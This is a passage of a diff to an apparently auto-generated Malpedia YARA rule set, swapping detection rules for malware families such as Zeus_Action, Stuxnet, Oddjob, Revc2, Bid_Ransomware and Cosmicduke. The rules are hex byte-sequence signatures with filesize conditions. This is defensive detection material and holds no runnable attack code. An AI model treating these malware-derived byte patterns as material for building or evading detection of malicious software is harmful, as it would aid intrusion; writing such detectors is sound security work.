+		$sequence_5 = { 8b6c2438 68f1000000 68???????? 6a68 6891000000 6a04 e8???????? }
+		$sequence_6 = { 8b7c240c 8b4604 894704 8b0e 8b5608 51 52 }
+		$sequence_7 = { e8???????? 8be8 83c40c 85ed 753e b841000000 6852010000 }
+		$sequence_8 = { 8b4d04 83c102 3bc1 7cef 8b5504 83c202 895704 }
+		$sequence_9 = { 57 e8???????? 83c408 85c0 0f8489000000 8b0f 8b5500 }
 
 	condition:
-		7 of them and filesize < 135349248
+		7 of them and filesize < 2015232
 }
-rule MALPEDIA_Win_Zeus_Action_Auto : FILE
+rule MALPEDIA_Win_Stuxnet_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b1bc7ed7-2f41-59f6-b8c0-74ccb733a5b2"
+		id = "64e9fab1-7d89-5a6e-8a31-2df625be17c1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_action"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeus_action_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stuxnet_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e0a4177bac84ef56b9551fcc42fe4ba9ebe72ed006b608f1d2911d9c311b37c6"
+		logic_hash = "0de893dd2abe057bcddad1952313e85e04a81b980ccf81d569805dbd5ff30eda"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118430,32 +118464,32 @@ rule MALPEDIA_Win_Zeus_Action_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 ff15???????? 89866c070000 85c0 0f849c010000 ff15???????? }
-		$sequence_1 = { 59 ebb1 8365fc00 8d45fc 50 56 e8???????? }
-		$sequence_2 = { 50 ffd6 8b4304 83c40c 83400403 e9???????? 8d4df8 }
-		$sequence_3 = { c3 55 8bec 33d2 837d1008 53 8ada }
-		$sequence_4 = { ff15???????? 89442420 0fb705???????? 50 ff15???????? 668944241e 6a10 }
-		$sequence_5 = { 75e6 8b55e8 8b7508 8b7d0c 8b4510 eb05 }
-		$sequence_6 = { 8b3f 8b4f0c 8b5f08 894dfc 8b45f8 3b7df4 0f85ebfeffff }
-		$sequence_7 = { 3bc1 7e04 33c0 eb37 8b4d18 0fb73b 8b11 }
-		$sequence_8 = { eb76 80f96e 7523 8b4304 8b4804 8b5008 2bd1 }
-		$sequence_9 = { 8945e4 85c0 0f849f010000 8b4508 8bf8 c1ef06 a83f }
+		$sequence_0 = { e8???????? 84c0 7504 804e1104 e8???????? 84c0 7404 }
+		$sequence_1 = { ff750c 8d4580 50 e8???????? 33db 895dfc 8d4580 }
+		$sequence_2 = { ff75f8 8d963c0b0000 57 e8???????? 59 59 5f }
+		$sequence_3 = { c3 8b44240c 8906 33c0 40 5e c3 }
+		$sequence_4 = { 8d4580 50 8d8540ffffff 50 e8???????? c645fc05 50 }
+		$sequence_5 = { e8???????? ff75c8 8d45ec 50 e8???????? ff75c9 8d45ec }
+		$sequence_6 = { b8???????? e8???????? 51 8365f000 56 8b7508 8d45f0 }
+		$sequence_7 = { e8???????? eb02 33c0 c645fc00 8b7d08 83c704 50 }
+		$sequence_8 = { e8???????? 8906 895604 c9 c3 8b08 8b4004 }
+		$sequence_9 = { 8955ec c7042410270000 e8???????? c645fc01 8b0e 8b01 6a02 }
 
 	condition:
-		7 of them and filesize < 827392
+		7 of them and filesize < 2495488
 }
-rule MALPEDIA_Win_Global_Auto : FILE
+rule MALPEDIA_Win_Oddjob_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "84b4cf5c-c55a-5774-ae7f-5489c60753fa"
+		id = "ce6f270b-4df6-5ffb-b080-81b3ac10b32d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.global"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.global_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oddjob_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "09a9ad56bfef0ecdecd0c2b9ffb27931c564f59791efd5813a14ce69fded76ce"
+		logic_hash = "1f224904baf5c3783236036cd0bf598b6b7ff28b5975f43a99b2c079a61b51a9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118469,32 +118503,32 @@ rule MALPEDIA_Win_Global_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b44243c 8d1c2a 8d341f 03c6 89442468 }
-		$sequence_1 = { 899634100000 8b54be3c c1c80a c1ca17 33d0 8b8610100000 c1c808 }
-		$sequence_2 = { 807e1400 7507 8bce e8???????? 8b5e0c 8b7730 }
-		$sequence_3 = { 8bc2 c1e808 884306 884b03 885307 8b4d08 8bc1 }
-		$sequence_4 = { 23cb 23ce 03c9 c1f91f 23ca 8b54242c c1fa1f }
-		$sequence_5 = { 6a01 51 e8???????? 8b8c2430020000 8bc6 5f 5e }
-		$sequence_6 = { 7412 8b4c2434 ff7108 57 50 e8???????? 83c40c }
-		$sequence_7 = { 8b8e4c100000 899678100000 8b949e00080000 c1c816 c1ca09 33d0 }
-		$sequence_8 = { 8db8bc4d4300 57 ff15???????? ff0d???????? 83ef18 83ee01 75eb }
-		$sequence_9 = { e8???????? 8d85b80c0000 50 ff75ac ff75a8 e8???????? 83c418 }
+		$sequence_0 = { 399da494ffff 7520 399d9c94ffff 7418 8bb59c94ffff 8b06 56 }
+		$sequence_1 = { c6856affffff51 c6856bffffff8b c6856cffffff56 c6856dffffff14 }
+		$sequence_2 = { 888592fcffff c68593fcffff53 c68594fcffff3e c68595fcffff5b }
+		$sequence_3 = { 8d85fefdffff 57 50 c785ccf7ffff01000000 89bdc0f7ffff e8???????? }
+		$sequence_4 = { 8b7d08 57 8bcb e8???????? 57 8945e0 897d08 }
+		$sequence_5 = { 0f844c080000 663d7800 0f8442080000 663d5800 0f8438080000 83a598fbffff00 8bb5dcfbffff }
+		$sequence_6 = { 889dd3feffff 889dd4feffff 889dd5feffff c685d6feffff56 }
+		$sequence_7 = { f7f7 8b4508 8a0401 32c2 88040e 41 8955fc }
+		$sequence_8 = { c68558fcffff8b c68559fcffff76 c6855afcffff10 c6855bfcffff01 c6855cfcffffc3 c6855dfcffff53 }
+		$sequence_9 = { 83cfff f7f7 8b4508 8a0401 32c2 88040e }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Kivars_Auto : FILE
+rule MALPEDIA_Win_Interception_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "97e9352f-68df-56fa-86e0-872f02c50448"
+		id = "f1a298d5-70e2-5f27-b6ee-691574cd9abf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kivars"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kivars_auto.yar#L1-L164"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.interception"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.interception_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "4d20cf7aacd2e8c5bf1e2fc02d32857c61e25ca91f0ca5072534ea8bbca535b9"
+		logic_hash = "3520af3329a4b24d818d777e1e8f70b92d9cafa69a1f58bf6db64da9ed00530f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118508,38 +118542,32 @@ rule MALPEDIA_Win_Kivars_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 448bc0 488d542440 488b8c2478080000 e8???????? }
-		$sequence_1 = { e8???????? 4c8d442440 488d942464030000 488b8c24e0050000 e8???????? }
-		$sequence_2 = { c784247004000001000000 83bc247004000000 7548 c784247c05000000000000 488d8c2440010000 }
-		$sequence_3 = { e8???????? 90 488d4c2430 e8???????? 486344242c }
-		$sequence_4 = { 8bcb 66897304 e8???????? 83f8ff }
-		$sequence_5 = { 85c0 7424 50 8b4354 50 ffd7 }
-		$sequence_6 = { 49 80bc0c7b0100005c 7433 bf???????? 83c9ff }
-		$sequence_7 = { 33c0 8d7c2418 f3ab 8d4366 6689542418 6a00 6a00 }
-		$sequence_8 = { 488d8c24780b0000 e8???????? e9???????? 488d542430 488d8c2440010000 }
-		$sequence_9 = { 482bc8 488bc1 89442428 e9???????? 8b442440 ffc8 }
-		$sequence_10 = { e9???????? 488b842460100000 48ffc0 ba3a000000 }
-		$sequence_11 = { 51 89442420 897c2434 ff15???????? 8b4c241c }
-		$sequence_12 = { 0bf0 83e23f 83c703 83c504 8a443410 }
-		$sequence_13 = { 894c244e b900080000 668b5004 33c0 50 50 }
-		$sequence_14 = { 8d7a01 57 e8???????? 83c404 8bd8 }
-		$sequence_15 = { 8b842400010000 488bc8 ff15???????? 4889842480000000 4883bc248000000000 }
+		$sequence_0 = { 83e61f 8d1c8520ae0010 c1e603 8b03 f644300401 7469 57 }
+		$sequence_1 = { 72f1 56 8bf1 c1e603 3b96e8710010 }
+		$sequence_2 = { c1f805 83e61f 8d1c8520ae0010 c1e603 8b03 }
+		$sequence_3 = { ffb6ec710010 8d8560ffffff 50 e8???????? 6810200100 8d8560ffffff }
+		$sequence_4 = { 8bd0 c1f905 83e21f 8b0c8d20ae0010 f644d10401 }
+		$sequence_5 = { 8d3c8520ae0010 c1e603 8b07 03c6 f6400401 7437 }
+		$sequence_6 = { f683c19c001004 7406 8816 46 }
+		$sequence_7 = { 8d542434 f3ab 66ab aa }
+		$sequence_8 = { 8bc8 83e01f c1f905 8b0c8d20ae0010 8a44c104 }
+		$sequence_9 = { 731c 8bc8 83e01f c1f905 8b0c8d20ae0010 f644c10401 8d04c1 }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Micrass_Auto : FILE
+rule MALPEDIA_Win_Revc2_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a229f115-b5ac-5aa3-9ddb-ec5c8630e70f"
+		id = "a9d168dd-7c35-55c3-a239-5afaaa4e5d1b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.micrass_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revc2"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.revc2_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "639446b0255ff71a4b5f82ebea10985e5191c147bc877240c832d8560fe4064d"
+		logic_hash = "940c1d8169d85582e91801f5b035bb96d22b7337aecd24f108d64e53de46b408"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118553,32 +118581,32 @@ rule MALPEDIA_Win_Micrass_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 33db 53 6801001f00 ff15???????? 3bc3 }
-		$sequence_1 = { 770f 0fb7c2 0fbe80e8014100 83e00f eb02 }
-		$sequence_2 = { c1f905 8d3c8da0dd4000 8bf0 83e61f c1e606 }
-		$sequence_3 = { 50 8d85c03fffff 50 e8???????? 59 59 85c0 }
-		$sequence_4 = { a1???????? 33c5 8945fc ff7508 8d85e04fffff 56 }
-		$sequence_5 = { 56 50 e8???????? 8b85e44fffff 83c40c }
-		$sequence_6 = { c1f905 8b0c8da0dd4000 83e01f c1e006 f644080401 74cd }
-		$sequence_7 = { c785fcfefffff4f4f4f4 c78500fffffff4f4f4f4 c78504fffffff4f4f4f4 c78508fffffff4f4f4f4 }
-		$sequence_8 = { c745a0808084b7 c745a4989b8791 c745a8bc959a90 c745ac9891f4f4 c745b0f4f4f4f4 c745b4f4f4f4f4 }
-		$sequence_9 = { c745b8f4f4f4f4 c745bcf4f4f4f4 c745c0f4f4f4f4 c745c4f4f4f4f4 }
+		$sequence_0 = { 8d4701 458bca 458bec 0f45f8 be01000000 8364244000 4183e21f }
+		$sequence_1 = { e8???????? 498946b0 488bc3 49894500 486307 4c6bf068 410fb6842434010000 }
+		$sequence_2 = { 90 488d8d90000000 e8???????? 90 488d4dd0 e8???????? 90 }
+		$sequence_3 = { ff15???????? e9???????? 488b0e 488b11 0fb74214 a804 0f84ab010000 }
+		$sequence_4 = { c5fe6f27 c5fe6f15???????? c5fe6f2d???????? c5fd71d404 c5fddbca c4e24d00d9 c5eddbc4 }
+		$sequence_5 = { eb12 4863c6 488d0c40 488b8388000000 488d04c8 895008 418d7701 }
+		$sequence_6 = { e8???????? 4c8b8424b8000000 498b38 4885ff 0f84fa010000 418bdd 4c8d0dca611200 }
+		$sequence_7 = { 4c894dc0 4889542450 4889442458 4c895c2440 895c2430 895c2470 895da0 }
+		$sequence_8 = { e8???????? 90 4c8bc0 488d4d50 e8???????? 488bf8 488d542450 }
+		$sequence_9 = { e8???????? 488bc3 488b5c2450 488b7c2458 4883c440 5d c3 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 5108736
 }
-rule MALPEDIA_Win_Xxmm_Auto : FILE
+rule MALPEDIA_Win_Bid_Ransomware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "800c8101-0763-52f5-a1e9-65fcf4499abd"
+		id = "ce47ce7f-14e1-59ae-ba57-79394ad6dc42"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xxmm_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bid_ransomware_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "b2b78d64096201d10c34f38aaeb6c676ad8ec13dc60f928c2884568102dbff1f"
+		logic_hash = "f1877b67a4049109e0b2de66aad3ce4469b6223b173e84f5ebaf276fe703ce2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118592,32 +118620,32 @@ rule MALPEDIA_Win_Xxmm_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895d08 47 81e7ff000080 7908 }
-		$sequence_1 = { 8a0408 8b55fc 320432 8806 46 ff4d08 759b }
-		$sequence_2 = { 23c3 013c08 eb1e 6683ff01 }
-		$sequence_3 = { 8b45f4 83c704 85c0 7406 }
-		$sequence_4 = { 7580 8b45f8 2b4634 83bea400000000 8945fc 0f8481000000 8b96a0000000 }
-		$sequence_5 = { 8d040f 0fb610 035510 81e2ff000080 7908 }
-		$sequence_6 = { 3bc1 0f8568feffff 8b733c 6a40 6800300000 03f3 ff7650 }
-		$sequence_7 = { 23c3 66013c08 8b45e0 8345f402 85c0 }
-		$sequence_8 = { 77b7 8b45f0 8b5dfc 33c9 394de4 7414 }
-		$sequence_9 = { 8945fc e8???????? 8b45fc 6800240000 bf???????? 03c3 57 }
+		$sequence_0 = { 8d45a4 50 6a00 6a00 68???????? 6a00 }
+		$sequence_1 = { 68???????? e8???????? 85c0 0f848d000000 8b7508 ff7508 }
+		$sequence_2 = { e8???????? 60 6a00 6a02 e8???????? 8bd8 c785d4fdffff2c020000 }
+		$sequence_3 = { e8???????? c9 c3 55 8bec 60 }
+		$sequence_4 = { e8???????? 83f800 7605 8945f4 eb02 ebc9 }
+		$sequence_5 = { ff759c e8???????? 8b45a8 0500040000 894590 6800010000 }
+		$sequence_6 = { 6a00 6a00 e8???????? 6a0f 50 }
+		$sequence_7 = { ff75f4 e8???????? ff75fc e8???????? ff05???????? ff75e4 e8???????? }
+		$sequence_8 = { e8???????? 8d85d4fdffff 50 53 e8???????? ebb4 53 }
+		$sequence_9 = { 6a00 8d00 50 e8???????? eb79 8b5814 66813b5c5c }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Bqtlock_Auto : FILE
+rule MALPEDIA_Win_Maggie_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb5e42ac-0a96-533f-bdf8-f7363192cc82"
+		id = "81084c1b-a8b2-52e1-b50c-8b61dc38259b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bqtlock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bqtlock_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maggie"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.maggie_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "fe09c813bf2717fae94718806fa0772093be79bdfe9076451ef94ec757b5ff93"
+		logic_hash = "c0bf28bd0446ea04e23665ed8ce11b5b78fa1a4a971a7efa9966e49954f77131"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118631,32 +118659,32 @@ rule MALPEDIA_Win_Bqtlock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f859b000000 8b08 e8???????? 6690 4c89e1 e8???????? 48c745e800000000 }
-		$sequence_1 = { 498d5508 4c89c1 4829d1 83e108 742f 498b5508 4839d0 }
-		$sequence_2 = { 488d540002 e8???????? 488b4ba0 4885c9 7405 e8???????? 488b4500 }
-		$sequence_3 = { 4d85c0 48895110 4889cb 0f95c0 31d2 894108 488d057fde0a00 }
-		$sequence_4 = { 4c89d9 ff5048 83f8ff 0f8451020000 4c8b5c2468 89c1 0fb6d0 }
-		$sequence_5 = { 4c8d742450 4531d2 4c894c2438 4c89e9 4c89742440 48c744244800000000 664489542450 }
-		$sequence_6 = { 488d4110 488901 4885d2 7505 4d85c0 7510 4531c9 }
-		$sequence_7 = { 4c8d0daa38fcff 488b4038 4c39c8 0f856d030000 4839f2 740b 4889f2 }
-		$sequence_8 = { b800000000 ba00000000 480f45542460 410f44c6 4889542460 4038f0 0f84fdfaffff }
-		$sequence_9 = { 4d85c0 0f8469fdffff e9???????? e8???????? 4889c3 ff542438 8b00 }
+		$sequence_0 = { ff15???????? e8???????? 84c0 74ec e8???????? }
+		$sequence_1 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 }
+		$sequence_2 = { 663b05???????? 7505 e8???????? e8???????? }
+		$sequence_3 = { 7511 ff15???????? 85c0 7407 33c0 e9???????? }
+		$sequence_4 = { b8ff000000 663b05???????? 7505 e8???????? }
+		$sequence_5 = { 750f ff15???????? 2d33270000 f7d8 }
+		$sequence_6 = { 750f ff15???????? 2d33270000 f7d8 1bc0 }
+		$sequence_7 = { 663b05???????? 7505 e8???????? e8???????? 84c0 }
+		$sequence_8 = { 83f8ff 750f ff15???????? 2d33270000 f7d8 1bc0 }
+		$sequence_9 = { ff15???????? 83f8ff 750f ff15???????? 2d33270000 f7d8 }
 
 	condition:
-		7 of them and filesize < 4444160
+		7 of them and filesize < 611328
 }
-rule MALPEDIA_Win_Slimagent_Auto : FILE
+rule MALPEDIA_Win_Gophe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "81a11c11-c6ba-51d7-a103-aa43fd5efed5"
+		id = "2491eb29-3935-5849-a2ad-9eccac6a7b9a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slimagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slimagent_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gophe_auto.yar#L1-L159"
 		license_url = "N/A"
-		logic_hash = "78304dd9a4e758407499c150f8ded9d2c3d715e90c8046900ee52970af3e3c9d"
+		logic_hash = "5cb34ff791810c63e96dde8e723ffcb01f24b10439430c6d1044dfaa95dacbda"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118670,32 +118698,38 @@ rule MALPEDIA_Win_Slimagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bc2 488d0df5440200 0f57c0 48890b 488d5308 488d4808 0f1102 }
-		$sequence_1 = { b801000000 874110 85c0 7427 8364244000 488d05d2a5feff 4889442448 }
-		$sequence_2 = { c3 4053 4883ec20 488d054bcf0200 488bd9 488901 f6c201 }
-		$sequence_3 = { 0f1102 e8???????? 488d058c780200 488903 488bc3 4883c420 5b }
-		$sequence_4 = { 66413b444b02 7515 4883c102 4883f90b 7415 0fb7044a 66413b044b }
-		$sequence_5 = { 488d0c4f 41b810000000 488d15004c0400 e8???????? 6646892c77 eb7d 48c744242008000000 }
-		$sequence_6 = { 4c8b83f0000000 498bc0 482bc1 483bd0 772f 488d3411 }
-		$sequence_7 = { 488bc2 48c1e83f 4803d0 4863c2 4869c880aefeff 488d0535240100 89531c }
-		$sequence_8 = { 4803fa 4d8bc6 33d2 488bcf e8???????? 42c6043700 eb0f }
-		$sequence_9 = { 48899fc8000000 668919 488d8fd8000000 4883bff000000008 7207 }
+		$sequence_0 = { 833902 0f94c0 84c0 7407 }
+		$sequence_1 = { b905000000 ff15???????? 8b05???????? 85c0 }
+		$sequence_2 = { 8d45f4 64a300000000 68e0000000 e8???????? 83c404 }
+		$sequence_3 = { 85c0 7509 b803000000 5d }
+		$sequence_4 = { c744242880000008 c744242003000000 4533c9 ba00000080 458d4103 }
+		$sequence_5 = { 85f6 7416 6830020000 6a00 }
+		$sequence_6 = { c744242010000000 4533c9 4c8b4210 8b5208 ff9088000000 }
+		$sequence_7 = { 57 68???????? c70605000000 e8???????? }
+		$sequence_8 = { 85c0 7838 488b4c2440 ff15???????? 8bf8 85c0 }
+		$sequence_9 = { 8bf0 83c404 8bd6 b9???????? }
+		$sequence_10 = { 8bf8 e8???????? 83c408 8d5001 }
+		$sequence_11 = { 837d0800 7507 b802000000 5d c3 33c0 }
+		$sequence_12 = { 90 4c8b45b8 4d8bc8 4d8b00 }
+		$sequence_13 = { b801000000 eb09 83c8ff eb04 }
+		$sequence_14 = { c744242880000000 c744242003000000 4533c9 4533c0 ba00000080 ff15???????? 488bf8 }
+		$sequence_15 = { 8b4dec 33cd e8???????? 8be5 5d c21000 c745fc02000000 }
 
 	condition:
-		7 of them and filesize < 769024
+		7 of them and filesize < 1582080
 }
-rule MALPEDIA_Win_Satan_Auto : FILE
+rule MALPEDIA_Win_Fuwuqidrama_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "68d44cab-535c-5e80-af20-cc11a23f278f"
+		id = "fa930744-5999-561a-b1cf-4c1122391afe"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.satan_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fuwuqidrama"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fuwuqidrama_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d0b3d89d021ce91fc4570ebd9fe46022bd9b8c1b3f3581186971725c2d3f1922"
+		logic_hash = "76d62a17f159b8ceb3cf4ce032c2e526c9b8417f56a11565dc77a48334fec771"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118709,32 +118743,32 @@ rule MALPEDIA_Win_Satan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b02 c1f806 8b4d0c 8b11 83e23f 6bca30 8b148540e04700 }
-		$sequence_1 = { 8d4db8 c745fcffffffff e8???????? 8d45b8 c745fc10000000 50 8d45e4 }
-		$sequence_2 = { 8945cc c645d300 c745c8ffffffff 83cbff 895dc4 c745d800000000 c745dc00000000 }
-		$sequence_3 = { 3305???????? b904000000 6bd124 8982d0d14700 68???????? 8b45fc 50 }
-		$sequence_4 = { 660f123d???????? 25ff010000 83c001 25fe030000 f20f592c85c01a4700 f20f591485c01a4700 660f5834c5d0224700 }
-		$sequence_5 = { 7511 3d00200000 740a be06000000 33c9 8975c0 894dc8 }
-		$sequence_6 = { f20f5cc3 03c0 03c0 03c0 03c0 660f289800334700 660f2835???????? }
-		$sequence_7 = { c745fc00000000 33c9 8b751c ba02000000 46 8bc6 f7e2 }
-		$sequence_8 = { 8bff 55 8bec 83ec10 8b4508 8d0c8598e24700 51 }
-		$sequence_9 = { e8???????? 8d45b8 c745fc10000000 50 8d45e4 b9???????? 50 }
+		$sequence_0 = { 51 8bcf e8???????? 8d9424d4020000 6a04 52 8bcf }
+		$sequence_1 = { 83c10c 48 894c2434 89442418 75bd 8b742444 8b06 }
+		$sequence_2 = { c1fa05 8bc2 c1e81f 03d0 895508 8d4d08 6a04 }
+		$sequence_3 = { 33d2 eb16 8b4e08 2bc8 b815024d21 f7e9 c1fa06 }
+		$sequence_4 = { fec8 5f 8841ff 8bc5 5e 5d 5b }
+		$sequence_5 = { b90b000000 8bf0 8bfa 83c02c f3a5 8b4c2420 83c22c }
+		$sequence_6 = { 23ee 8b742428 23f7 8bd9 0bee 8b74241c c1c305 }
+		$sequence_7 = { 8db5f4000000 8d9d14010000 c744241800000000 e8???????? 8b442410 85c0 0f8c08010000 }
+		$sequence_8 = { 83c410 48 894720 53 ff15???????? 5f 5e }
+		$sequence_9 = { 03ee 8b742410 c1c71e 8db42ea1ebd96e 8b6930 33691c 33df }
 
 	condition:
-		7 of them and filesize < 1163264
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Voldemort_Auto : FILE
+rule MALPEDIA_Win_Cosmicduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7d125483-3b6e-5a9c-99c0-128adae803f8"
+		id = "3cb396e5-37a7-5104-9052-2cb8d08028c4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.voldemort"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.voldemort_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cosmicduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cosmicduke_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "6016b2bc3970bf978eb2d9654ea41d202d59cf54c1ab79dd97509026eb74172c"
+		logic_hash = "c91b7a120fba1263ab464236cd77e48a69e2be7cc7ffc669f627390a309044cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -118748,34 +118782,34 @@ rule MALPEDIA_Win_Voldemort_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4803c1 48894308 e9???????? 48895c2408 }
-		$sequence_1 = { 48894308 e9???????? 48895c2408 57 }
-		$sequence_2 = { 418ac0 c3 488bc4 48895808 48896810 48897018 48897820 }
-		$sequence_3 = { 0f45c7 4803c1 48894308 e9???????? 48895c2408 57 4883ec20 }
-		$sequence_4 = { 488b5c2408 418ac0 c3 488bc4 }
-		$sequence_5 = { 7597 41b001 488b5c2408 418ac0 c3 488bc4 }
-		$sequence_6 = { 488b5c2408 418ac0 c3 488bc4 48895808 48896810 48897018 }
-		$sequence_7 = { 8d78fe 0f45c7 4803c1 48894308 e9???????? 48895c2408 }
-		$sequence_8 = { 488b5c2408 418ac0 c3 488bc4 48895808 48896810 }
-		$sequence_9 = { 5f c3 4c8bdc 49895b18 57 4883ec40 }
+		$sequence_0 = { 895df4 53 33f6 885dfb ff15???????? 85c0 0f8591000000 }
+		$sequence_1 = { eb0e 68???????? 8d85c0f9ffff 50 ffd3 68???????? 8d85d0fdffff }
